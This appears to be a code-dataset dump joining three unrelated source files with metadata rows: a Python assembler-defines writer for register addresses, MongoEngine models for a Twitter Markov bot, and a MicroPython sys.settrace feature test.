# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""
EquWriter - Writes out Assembler defines (based off the GNU assembler)
"""
from regenerate.writers.writer_base import WriterBase, ExportInfo
class AsmEqu(WriterBase):
"""
Output file creation class that writes a set of constants representing
the token for the registers addresses.
"""
def __init__(self, dbase):
WriterBase.__init__(self, dbase)
self._offset = 0
self._ofile = None
def write_def(self, reg, prefix, offset):
"""
Writes the definition in the format of:
.equ register, address
"""
address = reg.address
base = reg.token
name = "%s%s, " % (prefix, base)
self._ofile.write("\t.equ %-30s 0x%s\n" % (name, address + offset))
def write(self, filename):
"""
Writes the output file
"""
self._ofile = open(filename, "w")
self._write_header_comment(self._ofile, 'site_asm.inc',
comment_char=';; ')
for reg_key in self._dbase.get_keys():
self.write_def(self._dbase.get_register(reg_key), self._prefix,
self._offset)
self._ofile.write('\n')
self._ofile.close()
EXPORTERS = [
(WriterBase.TYPE_BLOCK, ExportInfo(AsmEqu, ("Header files", "Assembler Source"),
"Assembler files", ".s", 'headers-asm'))
]
| gpl-2.0 | -8,399,737,680,129,126,000 | 33.015385 | 84 | 0.6237 | false | 3.962366 | false | false | false |
publicscience/brain | app/models.py | 1 | 2321 | import datetime
from app import db
class Tweet(db.Document):
created_at = db.DateTimeField(default=datetime.datetime.now, required=True)
tid = db.IntField(required=True, unique=True)
body = db.StringField(required=True, unique=True)
username = db.StringField(required=True, max_length=50)
meta = {
'allow_inheritance': True,
'indexes': ['-created_at', 'username'],
'ordering': ['-created_at']
}
class Muse(db.Document):
"""
A muse is a Twitter user
which the Brain learns from.
"""
created_at = db.DateTimeField(default=datetime.datetime.now, required=True)
username = db.StringField(required=True, unique=True, max_length=50)
negative = db.BooleanField(default=False)
meta = {
'allow_inheritance': True,
'indexes': ['-created_at', 'username'],
'ordering': ['-created_at']
}
class Config(db.Document):
"""
Configuration for the Brain.
If you make changes to this model,
you will need to drop the saved record
in the database.
$ mongo
> show dbs
> use <your db>
> db.config.drop()
Then restart the application.
"""
# Retweet probability threshold.
# The higher this is, the less the brain will retweet.
retweet_threshold = db.FloatField(required=True, default=0.9)
# Chance to act. Probability the brain will tweet.
# The lower this is, the less the brain will tweet.
chance_to_act = db.FloatField(required=True, default=0.05)
# Maximum amount of retweets in an interval.
# Cause sometimes it accidentally retweets a TON of stuff.
max_retweets = db.IntField(required=True, default=10)
# Some brain configuration.
ngram_size = db.IntField(required=True, default=1)
ramble = db.BooleanField(default=True)
spasm = db.FloatField(required=True, default=0.05)
meta = {
'max_documents': 1
}
class Doc(db.Document):
"""
A manually-fed training document for the Markov generator.
"""
created_at = db.DateTimeField(default=datetime.datetime.now, required=True)
body = db.StringField(required=True, unique=True)
meta = {
'allow_inheritance': True,
'indexes': ['-created_at'],
'ordering': ['-created_at']
}
| mit | 7,952,930,502,741,536,000 | 28.379747 | 79 | 0.637656 | false | 3.767857 | false | false | false |
kerneltask/micropython | tests/misc/sys_settrace_features.py | 7 | 2491 | import sys
try:
sys.settrace
except AttributeError:
print("SKIP")
raise SystemExit
def print_stacktrace(frame, level=0):
# Ignore CPython specific helpers.
if frame.f_globals["__name__"].find("importlib") != -1:
print_stacktrace(frame.f_back, level)
return
print(
"%2d: %s@%s:%s => %s:%d"
% (
level,
" ",
frame.f_globals["__name__"],
frame.f_code.co_name,
# reduce full path to some pseudo-relative
"misc" + "".join(frame.f_code.co_filename.split("tests/misc")[-1:]),
frame.f_lineno,
)
)
if frame.f_back:
print_stacktrace(frame.f_back, level + 1)
class _Prof:
trace_count = 0
def trace_tick(self, frame, event, arg):
self.trace_count += 1
print_stacktrace(frame)
__prof__ = _Prof()
alice_handler_set = False
def trace_tick_handler_alice(frame, event, arg):
print("### trace_handler::Alice event:", event)
__prof__.trace_tick(frame, event, arg)
return trace_tick_handler_alice
bob_handler_set = False
def trace_tick_handler_bob(frame, event, arg):
print("### trace_handler::Bob event:", event)
__prof__.trace_tick(frame, event, arg)
return trace_tick_handler_bob
def trace_tick_handler(frame, event, arg):
# Ignore CPython specific helpers.
if frame.f_globals["__name__"].find("importlib") != -1:
return
print("### trace_handler::main event:", event)
__prof__.trace_tick(frame, event, arg)
if frame.f_code.co_name != "factorial":
return trace_tick_handler
global alice_handler_set
if event == "call" and not alice_handler_set:
alice_handler_set = True
return trace_tick_handler_alice
global bob_handler_set
if event == "call" and not bob_handler_set:
bob_handler_set = True
return trace_tick_handler_bob
return trace_tick_handler
def factorial(n):
if n == 0:
return 1
else:
return n * factorial(n - 1)
def do_tests():
# These commands are here to demonstrate some execution being traced.
print("Who loves the sun?")
print("Not every-", factorial(3))
from sys_settrace_subdir import trace_generic
trace_generic.run_tests()
return
sys.settrace(trace_tick_handler)
do_tests()
sys.settrace(None)
print("\n------------------ script exited ------------------")
print("Total traces executed: ", __prof__.trace_count)
| mit | 3,555,715,638,384,300,500 | 22.064815 | 80 | 0.596146 | false | 3.558571 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.